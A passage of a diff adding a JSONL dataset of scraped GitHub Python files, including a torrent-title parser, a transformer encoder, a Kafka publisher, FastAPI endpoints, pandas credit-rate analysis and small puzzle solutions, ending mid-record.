diff --git "a/2787.jsonl" "b/2787.jsonl" new file mode 100644--- /dev/null +++ "b/2787.jsonl" @@ -0,0 +1,2387 @@ +{"seq_id":"24795860828","text":"import re\nfrom .torcategory import cutExt\n\n\ndef isFullAscii(str):\n return re.fullmatch(r'[\\x00-\\x7F]*', str, re.A)\n\n\ndef containsCJK(str):\n return re.search(r'[\\u4e00-\\u9fa5\\u3041-\\u30fc]', str)\n\n\ndef containdCJKKeyword(str):\n return re.search(r'^(.迪士尼\\b)', str)\n\n\ndef notTitle(str):\n return re.search(r'^(BDMV|1080[pi]|MOVIE|DISC|Vol)', str, re.A | re.I)\n\n\ndef cutAKA(titlestr):\n m = re.search(r'\\s(/|AKA)\\s', titlestr, re.I)\n if m:\n titlestr = titlestr.split(m.group(0))[0]\n return titlestr.strip()\n\ndef cutAKAJP(titlestr):\n m = re.search(r'(/|\\bAKA\\b)', titlestr, re.I)\n if m:\n titlestr = titlestr.split(m.group(0))[0]\n return titlestr.strip()\n\n\ndef getIndexItem(items, index):\n if index >= 0 and index < len(items):\n return items[index]\n else:\n return ''\n\ndef is0DayName(itemstr):\n # CoComelon.S03.1080p.NF.WEB-DL.DDP2.0.H.264-NPMS\n m = re.match(r'^\\w+.*\\b(BluRay|Blu-?ray|720p|1080[pi]|2160p|576i|WEB-DL|\\.DVD\\.|WEBRip|HDTV)\\b.*', itemstr, flags=re.A | re.I)\n return m\n \n\ndef getNoBracketedStr(torName, items):\n ss = torName\n for s in items:\n ss = ss.replace('[' + s + ']', '')\n ss = ss.replace('[', '')\n ss = ss.replace(']', '')\n ss = ss.strip()\n\n return ss\n\ndef cutBracketedTail(sstr):\n m = re.search(r'^\\w+.*(\\[[^]]*\\]?)', sstr)\n if m:\n sstr = sstr[:m.span(1)[0]]\n return sstr\n\n\ndef parseJpAniName(torName):\n yearstr, yearspan = parseYear(torName)\n\n items = re.findall(r'\\[([^]]*[^[]*)\\]', torName)\n\n if len(items) < 2:\n return parse0DayMovieName(torName)\n\n for s in items:\n if is0DayName(s):\n return parse0DayMovieName(s)\n\n strLeft = getNoBracketedStr(torName, items)\n if len(strLeft) > 0:\n # yearstr, titlestr = getYearStr(torName)\n titlestr = bracketToBlank(strLeft)\n return cutAKAJP(titlestr), yearstr, '', '', ''\n\n jptitles = []\n titlestrs = []\n jptitle = ''\n titlestr = ''\n for item in items:\n if re.match(r'^(BDMV|EAC|XLD|1080[pi]|MOVIE|DISC|Vol\\.?\\d+|MPEG|合集|ALBUM|SBCV|FLAC|SINGLE|V\\.A|VVCL)\\b', item, re.A | re.I):\n continue\n if re.match(r'^\\d+$', item):\n continue\n \n if containsCJK(item):\n jptitles.append(item) \n else:\n titlestrs.append(item)\n\n if len(titlestrs) > 0:\n titlestr = titlestrs[0]\n # titlestr = max(titlestrs, key=len)\n if jptitles:\n jptitle = max(jptitles, key=len)\n else:\n if jptitles:\n # jptitle = jptitles[0]\n jptitle = max(jptitles, key=len)\n titlestr = jptitle\n else:\n pass\n # raise 'Some thing Wrong'\n\n titlestr = cutBracketedTail(titlestr)\n titlestr = bracketToBlank(titlestr)\n\n return cutAKAJP(titlestr), yearstr, '', '', jptitle\n\n\ndef bracketToBlank(sstr):\n dilimers = ['(', ')', '-', '–', '_', '+']\n for dchar in dilimers:\n sstr = sstr.replace(dchar, ' ')\n return re.sub(r' +', ' ', sstr).strip()\n\ndef delimerToBlank(sstr):\n dilimers = ['[', ']', '.', '{', '}', '_', ',']\n for dchar in dilimers:\n sstr = sstr.replace(dchar, ' ')\n return sstr\n\ndef parseMovieName(torName):\n if torName.startswith('[') and torName.endswith('SP'):\n m = re.search(r'\\]([^]]*\\+.?SP)$', torName, flags=re.I)\n if m:\n namestr = torName[:m.span(1)[0]]\n return parseJpAniName(namestr)\n \n if torName.startswith('[') and torName.endswith(']'):\n return parseJpAniName(torName)\n else:\n return parse0DayMovieName(torName)\n\ndef parseSeason(sstr):\n seasonstr = ''\n seasonspan = [-1, -1]\n episodestr = ''\n\n # m1 = None\n # for m1 in re.finditer(r'(\\bS\\d+(-S\\d+)?)\\b', sstr, flags=re.A | re.I):\n # pass\n m1 = re.search(r'(\\bS\\d+(-S?\\d+))\\s(?!.*\\bS\\d+)', sstr, flags=re.A | re.I)\n if m1:\n seasonstr = m1.group(1)\n seasonspan = m1.span(1)\n sstr = sstr.replace(seasonstr, '')\n return seasonstr, seasonspan, episodestr\n\n # m2 = re.search(r'(\\b(S\\d+)([\\. ]?(\\d{4}[\\s\\.])?Ep?\\d+)?)\\b(?!.*S\\d+)', sstr, flags=re.A | re.I)\n m2 = re.search(r'(\\b(S\\d+)([\\. ]?(\\d{4}[\\s\\.])?Ep?\\d+)?)\\b', sstr, flags=re.A | re.I)\n if m2:\n seasonstr = m2.group(1)\n seasonspan = m2.span(1)\n if m2.group(3):\n seasonstr = m2.group(2)\n episodestr = m2.group(3)\n return seasonstr, seasonspan, episodestr\n\n # seasonsapn = mcns.span(1)\n # sstr = sstr.replace(mcns.group(1), '')\n mep = re.search(r'(Ep?\\d+(-Ep?\\d+)?)\\b', sstr, flags=re.A | re.I)\n if mep:\n seasonstr = 'S01'\n episodestr = mep.group(1)\n seasonspan = mep.span(1)\n # if mep.group(2):\n # seasonstr = mep.group(2)\n # seasonspan = mep.span(2)\n return seasonstr, seasonspan, episodestr\n\n\n mcns = re.search(r'(第?\\s*((\\d+)|([一二三四五六七八九十]))(-\\d+)?季)(\\s*第\\s*((\\d+)|([一二三四五六七八九十]))集)?', sstr, flags=re.I)\n if mcns:\n # origin_seasonstr = mcns.group(1)\n seasonspan = mcns.span(1)\n ssi = mcns.group(2)\n iss = '一二三四五六七八九'.find(ssi)\n if iss >= 0:\n ssi = str(iss+1).zfill(2)\n seasonstr = 'S' + ssi\n if mcns.group(6):\n episodestr = 'E' + mcns.group(7)\n\n return seasonstr, seasonspan, episodestr\n\n\n return seasonstr, seasonspan, episodestr\n\ndef parseYear(sstr):\n yearstr = ''\n yearspan = [-1, -1]\n m2 = re.search(\n r'\\b((19\\d{2}\\b|20\\d{2})(-19\\d{2}|-20\\d{2})?)\\b(?!.*\\b\\d{4}\\b.*)',\n sstr,\n flags=re.A | re.I)\n if m2:\n yearstr = m2.group(1)\n yearspan = m2.span(1)\n if re.search(r'[\\(\\[\\{]' + yearstr+r'\\b', sstr):\n # sstr = sstr[:yearspan[0] - 1]\n yearspan = [yearspan[0]-1, yearspan[1]+1]\n # elif re.search(r'\\w.*' + yearstr+r'\\b', sstr):\n # sstr = sstr[:yearspan[0]]\n\n return yearstr, yearspan\n\ndef cutspan(sstr, ifrom, ito):\n if (ifrom >= 0) and (len(sstr) > ito):\n sstr = sstr[0 : ifrom: ] + sstr[ito + 1 : :]\n return sstr\n\n\ndef parse0DayMovieName(torName):\n sstr = cutExt(torName)\n\n failsafeTitle = sstr\n\n sstr = re.sub(\n r'\\b((UHD)?\\s+BluRay|Blu-?ray|720p|1080[pi]|2160p|576i|WEB-DL|\\.DVD\\.|WEBRip|HDTV|Director(\\'s)?[ .]Cut|REMASTERED|LIMITED|Complete(?=[. -]\\d+)|SUBBED|TV Series).*$',\n '',\n sstr,\n flags=re.I)\n sstr = re.sub(r'\\[Vol.*\\]$', '', sstr, flags=re.I)\n\n sstr = re.sub(r'\\W?(IMAX|Extended Cut|\\d+CD|APE整轨)\\b.*$', '', sstr, flags=re.I)\n sstr = re.sub(r'[\\[\\(](BD\\d+|WAV\\d*|(CD\\-)?FLAC|Live|DSD\\s?\\d*)\\b.*$', '', sstr, flags=re.I)\n sstr = re.sub(r'^\\W?(BDMV|\\BDRemux|\\bCCTV\\d(HD)?|BD\\-?\\d*|[A-Z]{1,5}TV)\\W*', '', sstr, flags=re.I)\n\n sstr = re.sub(r'\\{[^\\}]*\\}.*$', '', sstr, flags=re.I)\n sstr = re.sub(r'([\\s\\.-](\\d+)?CD[\\.-]WEB|[\\s\\.-](\\d+)?CD[\\.-]FLAC|[\\s\\.-][\\[\\(\\{]FLAC[\\]\\)\\}]).*$', '', sstr, flags=re.I)\n sstr = re.sub(r'\\bFLAC\\b.*$', '', sstr, flags=re.I)\n sstr = re.sub(r'^[\\[\\(]\\d+[^\\)\\]]*[\\)\\]]', '', sstr, flags=re.I)\n\n\n sstr = re.sub(r'^\\W?CC_?\\b', '', sstr, flags=re.I)\n if sstr and sstr[-1] in ['(', '[', '{']:\n sstr = sstr[:-1]\n sstr = delimerToBlank(sstr)\n if sstr:\n failsafeTitle = sstr\n\n seasonstr, seasonspan, episodestr = parseSeason(sstr)\n yearstr, yearspan = parseYear(sstr)\n if not yearstr:\n yearstr, yearspan = parseYear(torName)\n yearspan = [-1, -1]\n\n if seasonspan[0] > yearspan[0]:\n syspan = seasonspan\n systr = seasonstr\n else:\n syspan = yearspan\n systr = yearstr\n\n skipcut = False\n if syspan and syspan[0] > 1 :\n spanstrs = sstr.split(systr)\n if containdCJKKeyword(sstr[:syspan[0]]):\n sstr = sstr[syspan[1]:]\n skipcut = True\n else:\n sstr = sstr[:syspan[0]]\n\n if not skipcut:\n sstr = cutspan(sstr, seasonspan[0], seasonspan[1])\n sstr = cutspan(sstr, yearspan[0], yearspan[1])\n if sstr:\n failsafeTitle = sstr\n\n sstr = re.sub(r'(\\b剧集|\\b全\\d+集|\\b\\d+集全|\\b\\w+(影|场|念|港)版|\\b国语|\\bDis[kc]\\s*\\d*|\\bBD\\d*).*$', '', sstr, flags=re.I)\n\n if sstr and sstr[-1] in ['(', '[', '{', '(', '【']:\n sstr = sstr[:-1]\n\n # if titlestr.endswith(')'):\n # titlestr = re.sub(r'\\(.*$', '', sstr).strip()\n cntitle = ''\n if containsCJK(sstr):\n cntitle = sstr\n # m = re.search(r'^.*[^\\x00-\\x7F](S\\d+|\\s|\\.|\\d|-|\\))*\\b(?=[a-zA-Z])', sstr, flags=re.A)\n # m = re.search( r'^.*[^a-zA-Z_\\- &0-9](S\\d+|\\s|\\.|\\d|-)*\\b(?=[A-Z])', titlestr, flags=re.A)\n m = re.search(r'^.*[\\u4e00-\\u9fa5\\u3041-\\u30fc](S\\d+|\\s|\\.|\\d|-|\\))*\\b(?=[a-zA-Z])',\n sstr, flags=re.A)\n if m:\n # ['(', ')', '-', '–', '_', '+']\n cntitle = m.group(0)\n if not re.search(r'\\s[\\-\\+]\\s', cntitle):\n # if len(sstr)-len(cntitle) > 4:\n sstr = sstr.replace(cntitle, '')\n else:\n m = re.search(r'^([\\w\\s]+)\\s([\\u4e00-\\u9fa5\\u3041-\\u30fc]+)\\s*$',sstr, flags=re.A)\n if m:\n cntitle = m.group(1)\n if not re.search(r'\\s[\\-\\+]\\s', cntitle):\n sstr = sstr.replace(cntitle, '')\n cntitle = cntitle.strip()\n\n titlestr = bracketToBlank(sstr)\n titlestr = cutAKA(titlestr)\n if not containsCJK(titlestr) and len(titlestr) < 3:\n titlestr = bracketToBlank(failsafeTitle)\n\n return titlestr, yearstr, seasonstr, episodestr, cntitle\n","repo_name":"ccf-2012/seedcross","sub_path":"crseed/tortitle.py","file_name":"tortitle.py","file_ext":"py","file_size_in_byte":9667,"program_lang":"python","lang":"en","doc_type":"code","stars":139,"dataset":"github-code","pt":"18"} +{"seq_id":"3569942387","text":"import torch.nn as nn\n\n\nclass TransformerEncoder(nn.Module):\n def __init__(self, \n embedding_dim, \n num_layer=2, \n num_head=8, \n dim_feedforward=2048, \n decoder_dropout=0.1, \n activation='relu',\n num_embeddings=None, \n embeddings=None):\n\n super().__init__()\n\n encoder_layer_unit = nn.TransformerEncoderLayer(\n d_model=embedding_dim, \n nhead=num_head, \n dim_feedforward=dim_feedforward, \n dropout=decoder_dropout, \n activation=activation)\n \n layer_norm = nn.LayerNorm(embedding_dim)\n\n self.encoder_layer = nn.TransformerEncoder(\n encoder_layer_unit, \n num_layers=num_layer, \n norm=layer_norm)\n\n if embeddings is not None:\n self.embedding_layer = embeddings\n else:\n self.embedding_layer = nn.Embedding(\n num_embeddings=num_embeddings,\n embedding_dim=embedding_dim)\n\n return\n\n def forward(self, input_ids, attention_mask=None, **kwargs):\n \"\"\"\n Dim:\n input_ids: (B x S)\n src_key_padding_mask: (B x S)\n Bool - True: masked / False: unmasked\n \"\"\"\n out = self.embedding_layer(input_ids)\n out = self.encoder_layer(src=out.permute(1, 0, 2), src_key_padding_mask=attention_mask)\n out = out.permute(1, 0, 2) # B x S x E\n return out # B x S x E\n\n def get_embedding_layer(self):\n return self.embedding_layer\n","repo_name":"IKMLab/UASSU","sub_path":"sum_dist/models/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"23953148386","text":"from apollo.events.event_handler import EventHandler\nfrom kafka import KafkaProducer\nfrom apollo.configurations import kafka_bootstrap_server\nfrom apollo.monitoring.tracing import print_publish_message\nimport json\nfrom datetime import datetime\n\ndef datetime_handler(x):\n if isinstance(x, datetime):\n return x.__str__()\n\nclass KafkaPublisher(EventHandler):\n _producer = None # KafkaProducer\n\n def __init__(self):\n self._producer = KafkaProducer(\n bootstrap_servers=kafka_bootstrap_server, \n max_in_flight_requests_per_connection=1, \n retries=2147483647, \n acks='all')\n \n def handle(self, envelope, success_callback, fail_callback):\n topic = envelope.topic\n partition_key = str.encode(envelope.partition_key) if envelope.partition_key != None else None\n json_body = json.dumps(envelope.body.to_dict(), sort_keys=True, default=datetime_handler)\n future = self._producer.send(topic, str.encode(json_body), partition_key)\n future.add_callback(success_callback, checkpoint=envelope.log_metadata)\n future.add_errback(fail_callback, checkpoint=envelope.log_metadata)","repo_name":"nghiaminhle/mysql-binlog-replication","sub_path":"src/apollo/log/binlog/reader/kafka_publisher.py","file_name":"kafka_publisher.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"70321562601","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport re\n\n\ndef get_total_weight(programs, index, weight=0):\n if (len(programs[index][\"children\"]) == 0):\n return weight + programs[index][\"weight\"]\n for child in programs[index][\"children\"]:\n child_index = programs.index(\n [x for x in programs if x[\"parent\"] == child][0])\n weight = get_total_weight(programs, child_index, weight)\n return weight + programs[index][\"weight\"]\n\n\ndef part1(in_data):\n programs = {}\n rexp = \"([a-z]+) \\([0-9]+\\)(?: -> ([a-z ,]+))*\"\n for line in in_data.split(\"\\n\"):\n parent, children = re.findall(rexp, line)[0]\n if (children == \"\"):\n children = []\n else:\n children = children.split(\", \")\n programs[parent] = children\n all_children = []\n for c in programs.values():\n all_children += c\n for parent, children in programs.items():\n if (len(children) > 0):\n if all(x != parent for x in all_children):\n return parent\n\n\ndef part2(in_data):\n programs = []\n rexp = \"([a-z]+) \\(([0-9]+)\\)(?: -> ([a-z ,]+))*\"\n for line in in_data.split(\"\\n\"):\n parent, weight, children = re.findall(rexp, line)[0]\n if (children == \"\"):\n children = []\n else:\n children = children.split(\", \")\n programs.append({\"parent\": parent,\n \"weight\": int(weight),\n \"children\": children})\n root_parent = part1(in_data)\n root_idx = programs.index(\n [x for x in programs if x[\"parent\"] == root_parent][0])\n current_program = programs[root_idx]\n while (len(current_program[\"children\"]) > 0):\n children_weights = []\n for child in current_program[\"children\"]:\n children_weights.append(get_total_weight(\n programs,\n programs.index(\n [x for x in programs if x[\"parent\"] == child][0])))\n odd_one_out = None\n for w in children_weights:\n if (children_weights.count(w) == 1):\n odd_one_out = w\n elif (children_weights.count(w) > 1):\n cur_correct_weight = w\n if (odd_one_out is None):\n for cw in children_weights:\n last_correct_weight -= cw\n return last_correct_weight\n else:\n ooo_child_idx = children_weights.index(odd_one_out)\n ooo_child_name = current_program[\"children\"][ooo_child_idx]\n cur_idx = programs.index(\n [x for x in programs if x[\"parent\"] == ooo_child_name][0])\n last_correct_weight = cur_correct_weight\n current_program = programs[cur_idx]\n\n\nwith open(\"input.txt\", \"r\") as in_file:\n in_data = in_file.read().strip()\n\n\nprint(part1(in_data))\nprint(part2(in_data))\n","repo_name":"jacopo-j/advent-of-code-2017","sub_path":"day07/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1873972628","text":"from enum import Enum\nfrom typing import List, Optional\n\nfrom fastapi import APIRouter\n\nfrom app import models\nfrom app.utils.database import es_client, mongo_cache_drop\nfrom app.utils.logging import log_args\nfrom app.utils.visjs_config import rels_limit\n\nfrom .functions import LiteratureTraitQueryProcessor, master_name\nfrom .index import ac_configs, literature_trait_index_name\n\nrouter = APIRouter()\n\n\nclass LiteratureTraitAcIndex(str, Enum):\n trait = \"trait\"\n semmed_predicate = \"semmed_predicate\"\n\n\n@router.get(\"/literature_trait\", response_model=bool)\ndef get_literature_trait(\n trait: str,\n semmed_predicate: Optional[str] = None,\n pval_threshold: float = 1e-5,\n limit: int = 500,\n overwrite: bool = False,\n) -> bool:\n \"\"\"This is the master processor. For actual data use sub-apis\"\"\"\n log_args(api=\"/literature_trait\", kwargs=locals())\n semmed_predicates = (\n [semmed_predicate] if semmed_predicate is not None else None\n )\n processor = LiteratureTraitQueryProcessor(\n params={\n \"trait\": trait,\n \"semmed_predicates\": semmed_predicates,\n \"pval_threshold\": pval_threshold,\n \"limit\": limit,\n }\n )\n res = processor.process_master(overwrite=overwrite)\n return res\n\n\n@router.get(\n \"/literature_trait/{endpoint}\",\n response_model=models.standard_endpoint_response,\n)\ndef get_literature_trait_endpoints(\n endpoint: models.TopicViewEndpoints,\n trait: str,\n semmed_predicate: Optional[str] = None,\n pval_threshold: float = 1e-5,\n limit: int = 500,\n rels_limit: int = rels_limit,\n overwrite: bool = False,\n):\n log_args(api=f\"/literature_trait/{endpoint.value}\", kwargs=locals())\n semmed_predicates = (\n [semmed_predicate] if semmed_predicate is not None else None\n )\n processor = LiteratureTraitQueryProcessor(\n params={\n \"trait\": trait,\n \"semmed_predicates\": semmed_predicates,\n \"pval_threshold\": pval_threshold,\n \"limit\": limit,\n }\n )\n res = None\n if endpoint.value == \"table\":\n res = processor.get_table_data(overwrite=overwrite)\n elif endpoint.value == \"network-plot\":\n res = processor.get_network_plot_data(\n rels_limit=rels_limit, overwrite=overwrite\n )\n elif endpoint.value == \"query\":\n res = processor.get_query_data(overwrite=overwrite)\n elif endpoint.value == \"query-diagram\":\n res = processor.get_query_diagram_data()\n return res\n\n\n@router.get(\"/literature_trait/cache/drop\", response_model=bool)\ndef get_literature_trait_cache_drop() -> bool:\n return mongo_cache_drop(master_name=master_name)\n\n\n@router.get(\"/literature_trait/ac/index\", response_model=bool)\ndef get_literature_trait_ac_index(overwrite: bool = False) -> bool:\n log_args(api=\"/literature_trait/ac/index\", kwargs=locals())\n return literature_trait_index_name(overwrite=overwrite)\n\n\n@router.get(\"/literature_trait/ac/{name}\", response_model=List[str])\ndef get_literature_trait_ac(\n name: LiteratureTraitAcIndex, query: str, size: int = 20\n) -> List[str]:\n log_args(api=f\"/literature_trait/ac/{name}\", kwargs=locals())\n ac_index = ac_configs[name.value]\n if not es_client.indices.exists(index=ac_index):\n get_literature_trait_ac_index()\n res = ac_configs[name][\"query_fn\"](\n query=query,\n index_name=ac_configs[name][\"index_name\"],\n es_client=es_client,\n size=size,\n )\n return res\n","repo_name":"MRCIEU/epigraphdb_web","sub_path":"backend/app/apis/topic_views/literature_trait/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"16133095115","text":"\nimport pandas as pd\nimport numpy as np\n\n#leemos los datos\ndetasa = pd.read_csv('Detalle_Tasa.csv')\ntipoen = pd.read_csv('Tipo_entidad.csv')\nenti = pd.read_csv('Entidades.csv')\ntipocred = pd.read_csv('Tipo_Credito.csv')\nplazos = pd.read_csv('Plazos.csv')\n\n\ndetasa.head()\ntipoen.head()\nenti.head()\ntipocred.head()\nplazos.head()\n\n# version rpta 1\n\ndf = detasa[['Id_entidad_financiera', 'Nombre_Tipo_Entidad', 'cod_sub_tipo', '(8)Tasa_efectiva_promedio_ponderada']]\ndf = df.sort_values(by=['(8)Tasa_efectiva_promedio_ponderada'], ascending=False).head(5)\ndf = df.sort_values(by=['Nombre_Tipo_Entidad', 'Id_entidad_financiera', 'cod_sub_tipo'])\n\n\n# esto era para hallar los 5 con mayor tasa de cada clasificacion\n#df = df.groupby(['Id_entidad_financiera','Nombre_Tipo_Entidad', 'cod_sub_tipo']).head(5)\n\n\ndf = df.merge(enti, how='left', on='Id_entidad_financiera') \n\ntipe = tipocred[['cod_sub_tipo', 'descripcion_tipo' ]]\ndf = df.merge(tipe, how='left', on='cod_sub_tipo') \n\ndf\n\n\n# Hasta ahi va el punto 1\n\n\ndk = detasa[['Id_entidad_financiera', 'Nombre_Tipo_Entidad', 'cod_sub_tipo', '(8)Tasa_efectiva_promedio_ponderada', '(10)Montos_desembolsados', '(11)Número_de_créditos_desembolsados']]\ndk = dk.merge(tipe, how='left', on='cod_sub_tipo') \ndk1 = dk.groupby(['Nombre_Tipo_Entidad', 'descripcion_tipo' ]).agg({'(8)Tasa_efectiva_promedio_ponderada':'mean', '(10)Montos_desembolsados':'sum', '(11)Número_de_créditos_desembolsados':'sum'})\n\n\ndk1\n\n# Hasta aqui va el punto 2\n\n\ndetasa['Fecha_Corte'] = pd.to_datetime(detasa['Fecha_Corte'])\ndetasaoct = detasa[ detasa['Fecha_Corte'].dt.month == 10]\n\n\n#a\ndk2 = detasaoct.groupby(['(3)Tamaño_de_empresa' ]).agg({'(8)Tasa_efectiva_promedio_ponderada':'mean', '(10)Montos_desembolsados':'sum'})\n\ndk2\n\n#b\ndk3 = detasaoct[detasaoct['(1)Tipo_de_persona']=='Natural']\n\ndk3 = dk3.groupby(['(6) Producto de crédito' ]).agg({'(8)Tasa_efectiva_promedio_ponderada':'mean', '(10)Montos_desembolsados':'sum'})\n\ndk3\n\n\n#c\n\ndetasaoct.groupby(['(7) Plazo de crédito' ])['(8)Tasa_efectiva_promedio_ponderada'].agg(['mean','count'])\n\n#d\n#solo estan los del mes oct\ndetasaoct.groupby(['(2)Sexo', '(5)Tipo_de_garantía' ]).agg({'(10)Montos_desembolsados':'sum', '(11)Número_de_créditos_desembolsados':'sum'})\n\n\n# Hasta aqui va el punto 3\n\n\n\n\n\ncasi1[['Fecha_Corte', 'Nombre_Tipo_Entidad', ]]\n\ncasi1 = detasa.merge(tipoen, how='left', on='Nombre_Tipo_Entidad') \ncasi2 = casi1.merge(enti, how='left', on='Id_entidad_financiera')\nplazos = plazos.rename(columns = {'Plazo_credito':'(7) Plazo de crédito'})\ncasi3 = casi2.merge(plazos, how='left', on='(7) Plazo de crédito')\nfinal = casi3.groupby(['Fecha_Corte', 'Tipo_Entidad', 'Nombre_Tipo_Entidad', 'Id_entidad_financiera', 'Entidad_financiera', '(1)Tipo_de_persona', '(3)Tamaño_de_empresa', 'Cod_Plazo', '(7) Plazo de crédito' ]).agg( {'(9)Margen_adicional_a_la_variación_para_créditos_en_UVR':['max', 'min'], '(8)Tasa_efectiva_promedio_ponderada': ['mean','max', 'min'], '(10)Montos_desembolsados': ['sum', 'min', 'max'], '(11)Número_de_créditos_desembolsados':'sum'})\n\nfinal\n\n\n\n# Hasta aqi el punto 4\n\n\n\n\n\n","repo_name":"juankaz1/itau_linares","sub_path":"itau_Linares.py","file_name":"itau_Linares.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70364328040","text":"import apache_couchdb.couch_database as db\nimport apache_couchdb.couchdb_parameters as cp\n\nimport preprocessing.preprocessing_parameters as pp\n\nfrom sklearn import cross_validation\nfrom sklearn.cross_validation import LabelShuffleSplit\nfrom sklearn.cross_validation import StratifiedShuffleSplit\n\nfrom sklearn.preprocessing import MultiLabelBinarizer\n\nfrom data_representation import dtm_provider\nimport data_representation.dataset_spliter as ds\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\nimport operator\n\ndef testClassifier():\n \n min_df=0.00003125\n \n dataset_document_name = ds.DEFAULT_DATASET_DOCUMENT_NAME\n \n #training part of dataset\n dataset_name_train=ds.DEFAULT_TRAININGSET_NAME\n #testing part of dataset\n dataset_name_test=ds.DEFAULT_TESTSET_NAME\n \n for document_fields in dtm_provider.DEFAULT_ALL_DOCUMENT_FIELDS:\n \n #used to retrieve correct document and fields\n used_fields = dtm_provider.retrieveValueForUsedFields(document_fields)\n \n #get the dtm for train\n document_train = dtm_provider.getDatasetContentDocumentFromDatabase(\n dataset_document_name, dataset_name_train, \n used_fields)\n \n document_test = dtm_provider.getDatasetContentDocumentFromDatabase(\n dataset_document_name, dataset_name_test, \n used_fields)\n \n t_vectorizer = TfidfVectorizer(analyzer='word',stop_words='english', \n min_df=min_df)\n \n document_train_content = document_train[dtm_provider.DSCD_FIELD_CONTENT]\n \n X_train_tfidf = t_vectorizer.fit_transform(document_train_content)\n targets_train = dtm_provider.buildTargetsFromDatasetContentDocument(document_train)\n \n \"\"\"printDetails(X_train_tfidf)\n printDetails(targets_train)\n print()\"\"\"\n \n document_test_content = document_train[dtm_provider.DSCD_FIELD_CONTENT]\n \n X_test_tfidf = t_vectorizer.transform(document_test_content)\n targets_test = dtm_provider.buildTargetsFromDatasetContentDocument(document_test)\n \n \"\"\"printDetails(X_test_tfidf)\n printDetails(targets_test)\n print()\n print()\"\"\"\n \n \n \"\"\"dtm_train, targets_train = \\\n dtm_provider.buildDTMAndTargetsOfDatasetContentDocument(\n document_train,t_vectorizer)\"\"\"\n \n #t_vectorizer = TfidfVectorizer(analyzer='word',min_df=0)\n \n \"\"\"dtm_test, targets_test = \\\n dtm_provider.buildDTMAndTargetsOfDatasetContentDocument(\n document_test,t_vectorizer)\"\"\"\n\n \n \n \ndef perform_train_test_split(db_name=ds.DEFAULT_DB_NAME,\n train_size=ds.DEFAULT_TRAININGSET_SIZE):\n \n \"\"\"\n Get all document_ids of given database and split's it according to given\n train_size.\n The tricky part is that we n\n \n :param db_name: Name of database to split documents (default DEFAULT_DB_NAME)\n :param train_size: Size in percentage [0,1] of the training set.\n :return splitted_dataset - List of lists \n [[DEFAULT_DATASET_LIST_INDEX_TRAINING], \n [DEFAULT_DATASET_LIST_INDEX_TEST]]\n \"\"\"\n \n database = db.couch_database(db_name)\n all_docs = database.getAllDocumentsFromDatabase()\n \n doc_ids_list = []\n all_tag_list = []\n \n i = 0\n \n for row in all_docs.rows:\n \n document = row.doc\n #append the document id to doc_ids_list\n doc_ids_list.append(document[cp.COUCHDB_DOCUMENT_FIELD_ID])\n \n tag_list = []\n \n #if document has tags than split and add them\n if pp.STACKEXCHANGE_TAGS_COLUM in document.keys():\n \n document_tags = document[pp.STACKEXCHANGE_TAGS_COLUM]\n \n tags_list = document_tags.split(sep=dtm_provider.TAG_SPLIT_separator)\n \n for tag in tags_list:\n \n #remove the closing tag (last item)\n tag_list.append(tag[:-1])\n #append the list of document tags to all_tag_list \n all_tag_list.append(tag_list)\n \n i += 1\n \n if i > 10000:\n break\n \n mlb = MultiLabelBinarizer()\n tags_encoded = mlb.fit_transform(all_tag_list)\n\n \n print(len(doc_ids_list))\n \n splitted_dataset = cross_validation.train_test_split(doc_ids_list,tags_encoded,\n train_size=0.8, random_state=42, \n stratify=tags_encoded)\n \ndef printDetails(dtm):\n \n print(dtm.shape)\n \ndef printDetailsDocument(document):\n \n print(document['_id'])\n \n#perform_train_test_split()\n\ntestClassifier()","repo_name":"davcem/stackexchange_text_classification","sub_path":"classification/classifier_inspect_splits.py","file_name":"classifier_inspect_splits.py","file_ext":"py","file_size_in_byte":5057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21876379708","text":"# https://uva.onlinejudge.org/index.php?option=onlinejudge&page=show_problem&problem=349\r\n\r\nwhile True:\r\n try:\r\n step, mod = [int(x) for x in input().split(' ')]\r\n listOfPossibleOutcomes = []\r\n seed = 0\r\n for i in range(mod):\r\n if i != 0:\r\n seed = listOfPossibleOutcomes[i-1]\r\n listOfPossibleOutcomes.append((seed+step) % mod)\r\n if 0 in listOfPossibleOutcomes and mod-1 in listOfPossibleOutcomes:\r\n print(str(step).rjust(10), str(mod).rjust(9), ' ', 'Good Choice')\r\n else:\r\n print(str(step).rjust(10), str(mod).rjust(9), ' ', 'Bad Choice')\r\n except:\r\n break\r\n","repo_name":"MannParutthi/CompetitiveProgramming","sub_path":"408UniformGenerator.py","file_name":"408UniformGenerator.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11325704584","text":"from django.contrib import admin\n\nfrom .models import Article\n\n\n@admin.register(Article)\nclass ArticleAdmin(admin.ModelAdmin):\n list_display = ('art_author', 'art_title', 'art_body', 'article_label', 'art_created_time')\n list_filter = ('art_author', 'article_label')\n search_fields = ('art_author', 'art_title', 'article_label')\n fieldsets = (\n ('文章信息', {\n 'fields': (\n ('article_label', 'art_author'),\n )\n }),\n ('文章内容', {\n 'fields': (\n ('art_title', 'art_body')\n )\n }),\n )\n","repo_name":"stayhungry134/chuangxue","sub_path":"article/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"11175484391","text":"from ..dojo_test_case import DojoTestCase, get_unit_tests_path\r\nfrom dojo.tools.xanitizer.parser import XanitizerParser\r\nfrom dojo.models import 